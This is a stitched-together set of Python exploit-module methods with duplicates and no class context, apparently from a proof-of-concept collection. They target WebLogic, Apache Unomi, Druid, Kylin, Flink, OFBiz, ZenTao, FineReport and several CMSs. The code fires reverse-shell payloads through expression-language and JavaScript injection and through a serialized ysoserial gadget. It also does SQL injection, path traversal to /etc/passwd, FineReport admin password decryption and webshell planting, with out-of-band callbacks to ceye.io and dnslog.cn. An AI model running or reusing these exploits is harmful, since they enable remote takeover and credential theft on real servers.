def _verify(self):
result = {}
veri_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
random_uri = random_str(16)
check_host = 'zum76x.ceye.io'
check_port = 80
payload = self.get_check_payload(check_host, check_port, random_uri)
headers = {
"Content-Type":
"text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
try:
requests.post(veri_url, data=payload, headers=headers)
resp = requests.get(
'http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request'
)
pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port,
random_uri)
if re.search(pattern, resp.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _shell(self):
result = {}
#执行反弹shell的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
IP = get_listener_ip()
PORT = get_listener_port()
# IP = yourlistenerip
# PORT = yourlistenerport
payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _shell(self):
result = {}
#执行反弹shell的请求
pocurl = self.url + '/druid/indexer/v1/sampler?for=filter'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
IP = yourlistenIP
PORT = yourlistenPORT
payload = 'nc ' + IP + ' ' + PORT + ' -e /bin/sh'
pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _verify(self):
result = {}
cookies = self.login()
CEye_main = CEye(token=self.token)
ceye_subdomain = CEye_main.getsubdomain()
random_uri = random_str(16)
logger.info("random_url为:%s" % random_uri)
verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain)
veri_url = urljoin(
self.url, '/kylin/api/diag/project/%7c%7c' + verify_payload +
'%7c%7c/download')
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Cookie": cookies
}
logger.info("Headres如下:")
logger.info(headers)
try:
resp = requests.get(veri_url, headers=headers)
if CEye_main.verify_request(random_uri):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _shell(self):
result = {}
#执行反弹shell的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
IP = get_listener_ip()
PORT = get_listener_port()
# IP = yourlistenerip
# PORT = yourlistenerport
payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _attack(self):
result = {}
try:
Flag_error = "This file does not exist in JobManager log dir"
if self.get_option("filename"):
attack_filename = self.get_option("filename").replace(
'/', '\\\\')
else:
attack_filename = 'App\\Common\\Conf\\db.php'
logger.info("下载文件为:" + attack_filename)
attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip'
attack_url = self.url + attack_payload
logger.info(attack_url)
cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
attack_res = requests.get(attack_url,
cookies=cookies,
verify=False)
if attack_res.status_code == 200 and Flag_error not in attack_res.content.decode(
):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = attack_url
result['VerifyInfo']['Payload'] = attack_payload
result['VerifyInfo'][
'File_Content'] = '\n' + attack_res.content.decode()
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def login(self):
login_url = urljoin(self.url, '/ofcms-admin/admin/dologin.json')
post_data = {
"username": self.get_option("username"),
"password": self.get_option("password")
}
headers = {
"Content-Type":
"application/json; charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
}
try:
resp = requests.post(login_url, data=json.dumps(post_data))
if resp.status_code == 200 and json.loads(
resp.text)['code'] == '200':
cookies = requests.utils.dict_from_cookiejar(resp.cookies)
cookie = "JSESSIONID=" + cookies["JSESSIONID"]
logger.info("获得的Cookie为:%s" % cookie)
logger.info("Ofcms系统登录成功")
else:
logger.info("Ofcms系统登录失败,报错为 %s " % str(resp.text))
except Exception as e:
logger.warn(e)
logger.warn("Ofcms系统登录失败")
return cookie
def _verify(self):
result = {}
cookies = self.login()
random_uri = random_str(16)
logger.info("random_uri为:%s" % random_uri)
verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
post_data = {"sql": verify_payload}
veri_url = urljoin(
self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Cookie": cookies
}
logger.info("Headres如下:")
logger.info(headers)
try:
resp = requests.post(veri_url, data=post_data, headers=headers)
flag = "~" + random_uri + "~"
if flag in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
veri_url = urljoin(self.url, '/_async/AsyncResponseService')
cmd = random_str(16) + '.6eb4yw.ceye.io'
payload = self.get_check_payload(cmd)
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'Cookie': "sidebar_collapsed=false",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
'Content-Length': "1001",
'cache-control': "no-cache"
}
try:
requests.post(veri_url, data=payload, headers=headers)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
veri_url = self.url + '/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml'
try:
resp = requests.get(veri_url)
pattern1 = r"<rootManagerPassword>.*</rootManagerPassword>"
patrern2 = r"<rootManagerName>.*</rootManagerName>"
r2 = re.search(patrern2, str(resp.content))
r1 = re.search(pattern1, str(resp.content))
username = r2.group(0)[28:-21]
cipher = r1.group(0)[32:-25]
PASSWORD_MASK_ARRY = [19, 78, 10, 15, 100, 213, 43, 23]
password = ""
cipher = cipher[3:]
for i in range(int(len(cipher) / 4)):
p1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
p2 = p1 ^ PASSWORD_MASK_ARRY[i % 8]
password = password + chr(p2)
if resp.status_code == 200 and password:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['AdminInfo'] = {}
result['AdminInfo']["UserName"] = username
result['AdminInfo']["Password"] = password
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _shell(self):
veri_url1 = urljoin(
self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = self.get_option("command")
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
requests.post(veri_url2, data=data, headers=headers)
except Exception as e:
logger.warn(str(e))
def _shell(self):
vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format(
get_listener_ip(), get_listener_port())
shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
try:
requests.post(vul_url, data=shell_payload, headers=headers)
except Exception as e:
logger.warn(str(e))
def _verify(self):
result = {}
try:
Flag_error = "This file does not exist in JobManager log dir"
verify_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts'
verify_url = self.url + verify_payload
logger.info(verify_url)
verify_res = requests.get(verify_url,verify=False)
if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode():
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
result['VerifyInfo']['Payload'] = verify_payload
result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode()
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
veri_url1 = urljoin(
self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = 'cat /proc/cpuinfo'
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
resp = requests.post(veri_url2, data=data, headers=headers)
if any(keyword in resp.text for keyword in
['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.warn(str(e))
return self.parse_verify(result)
def _verify(self):
result = {}
phpcode = "phpinfo()"
flagText = "allow_url_include"
verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)" + phpcode + ";if(1}{end if}"
veri_url = urljoin(self.url, '/search.php')
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
}
try:
resp = requests.post(veri_url,data=verify_payload,headers=headers)
if flagText in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _shell(self):
result = {}
random_uri = random_str(16)
try:
shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
base64_payload = base64.b64encode(shell_payload.encode())
shell_content = base64_payload.decode()
shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
print(shell_url)
cookies = {
"zentaosid": self.get_option("zentaosid")
}
down_res = requests.get(shell_url,cookies=cookies)
shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
logger.info("webshell地址:" + shell_info_url)
shell_res = requests.get(shell_info_url,cookies=cookies)
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
try:
Flag_error = "该文件不存在"
verify_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\xyhai.php/type/zip'
verify_url = self.url + verify_payload
logger.info(verify_url)
cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
verify_res = requests.get(verify_url,
cookies=cookies,
verify=False)
if verify_res.status_code == 200 and Flag_error not in verify_res.content.decode(
):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
result['VerifyInfo']['Payload'] = verify_payload
result['VerifyInfo'][
'File_Content'] = '\n' + verify_res.content.decode()
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _attack(self):
result = {}
try:
Flag_error = "This file does not exist in JobManager log dir"
if self.get_option("filename"):
attack_filename = quote(quote(self.get_option("filename"),'utf-8'))
else:
attack_filename = quote(quote("/etc/passwd",'utf-8'))
logger.info("下载文件为:" + attack_filename)
attack_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..' + attack_filename
attack_url = self.url + attack_payload
logger.info(attack_url)
attack_res = requests.get(attack_url,verify=False)
if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode():
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = attack_url
result['VerifyInfo']['Payload'] = attack_payload
result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
CEye_main = CEye(token=self.token)
ceye_subdomain = CEye_main.getsubdomain()
random_uri = random_str(16)
logger.info("random_url为:%s" % random_uri)
verify_payload = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% xxe SYSTEM "http://%s/%s">
%%xxe;
]>""" % (ceye_subdomain,random_uri)
logger.warn(verify_payload)
veri_url = self.url
logger.warn(veri_url)
headers = {
"Content-Type": "text/xml",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"SOAPAction": "aaa"
}
try:
resp = requests.post(veri_url,data=verify_payload,headers=headers)
if CEye_main.verify_request(random_uri):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _attack(self):
result = {}
random_uri = random_str(16)
try:
attack_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_attack.php'
base64_payload = base64.b64encode(attack_payload.encode())
attack_content = base64_payload.decode()
attack_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + attack_content
logger.info(attack_url)
cookies = {
"zentaosid": self.get_option("zentaosid")
}
down_res = requests.get(attack_url,cookies=cookies)
attack_info_url = self.url + '/data/client/'+random_uri+'/php_attack.php'
attack_res = requests.get(attack_info_url,cookies=cookies)
if attack_res.status_code ==200 and "d4d7a6b8b3ed8ed86db2ef2cd728d8ec" in attack_res.content.decode() :
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = attack_info_url
result['VerifyInfo']['Payload'] = attack_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
random_uri = random_str(16)
try:
verify_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_verify.txt'
base64_payload = base64.b64encode(verify_payload.encode())
verify_content = base64_payload.decode()
verify_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + verify_content
logger.info(verify_url)
cookies = {
"zentaosid": self.get_option("zentaosid")
}
down_res = requests.get(verify_url,cookies=cookies)
verify_info_url = self.url + '/data/client/'+random_uri+'/php_verify.txt'
verify_res = requests.get(verify_info_url,cookies=cookies)
if verify_res.status_code ==200 and "md5('3.1416');" in verify_res.content.decode() :
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_info_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def login(self):
login_url = urljoin(self.url, '/kylin/api/user/authentication')
login_data = b64encode((self.get_option("username") + ":" +
self.get_option("password")).encode("utf-8"))
headers = {"Authorization": "Basic %s" % login_data.decode('utf-8')}
post_data = {}
try:
resp = requests.post(login_url, data=post_data, headers=headers)
if resp.status_code == 401:
logger.info("账号或密码错误")
if resp.status_code == 200:
cookies = requests.utils.dict_from_cookiejar(resp.cookies)
cookie = "JSESSIONID=" + cookies["JSESSIONID"]
logger.info("获得的Cookie为:%s" % cookie)
logger.info("Apache_Kylin登录成功")
else:
logger.info("Apache_Kylin登录失败,响应状态码为 %s " %
str(resp.status_code))
except Exception as e:
logger.warn(str(e))
logger.warn("Apache_Kylin登录失败")
return cookie
def _verify(self):
result = {}
getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
getres_url = 'http://www.dnslog.cn/getrecords.php'
dnsheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
}
dnssess = requests.session()
#获取dnslog的subdomain
try:
dnsreq = dnssess.get(url=getdnssub_url,
headers=dnsheaders,
allow_redirects=False,
verify=False,
timeout=10)
except Exception as e:
logger.warn(str(e))
#执行ping dnslog的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
payload = 'ping catchyou.' + dnsreq.text
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
# pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
time.sleep(5)
except Exception as e:
logger.warn(str(e))
#检查dnslog日志
try:
dnsres = dnssess.get(url=getres_url,
headers=dnsheaders,
allow_redirects=False,
verify=False,
timeout=10)
if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
result['VerifyInfo'] = {}
# result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
result['VerifyInfo']['URL'] = self.url
result['extra'] = {}
result['extra']['evidence'] = dnsres.text
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _verify(self):
result = {}
getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
getres_url = 'http://www.dnslog.cn/getrecords.php'
dnsheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
}
dnssess = requests.session()
#获取dnslog的subdomain
try:
dnsreq = dnssess.get(url=getdnssub_url,
headers=dnsheaders,
allow_redirects=False,
verify=False,
timeout=10)
except Exception as e:
logger.warn(str(e))
#执行ping dnslog的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
payload = 'ping catchyou.' + dnsreq.text
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
# pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
time.sleep(5)
except Exception as e:
logger.warn(str(e))
#检查dnslog日志
try:
dnsres = dnssess.get(url=getres_url,
headers=dnsheaders,
allow_redirects=False,
verify=False,
timeout=10)
if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
result['VerifyInfo'] = {}
# result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
result['VerifyInfo']['URL'] = self.url
result['extra'] = {}
result['extra']['evidence'] = dnsres.text
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _verify(self):
result = {}
mainurl = self.url + '/myportal/control/main'
r1 = requests.get(url=mainurl, verify=False)
print(r1.status_code, r1.text)
pocurl = self.url + '/webtools/control/xmlrpc'
headers = {'Content-Type': 'application/xml', 'Content-Length': '4127'}
payload = 'rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABu/K/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQBdYmFzaCAtYyB7ZWNobyxZbUZ6YUNBdGFTQStKaUF2WkdWMkwzUmpjQzh4T1RJdU1UWTRMalV5TGpFdk5qWTJOaUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9CAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2VyaWFsL1B3bmVyMTE1NDY2NjE4MDA0MAEAHkx5c29zZXJpYWwvUHduZXIxMTU0NjY2MTgwMDQw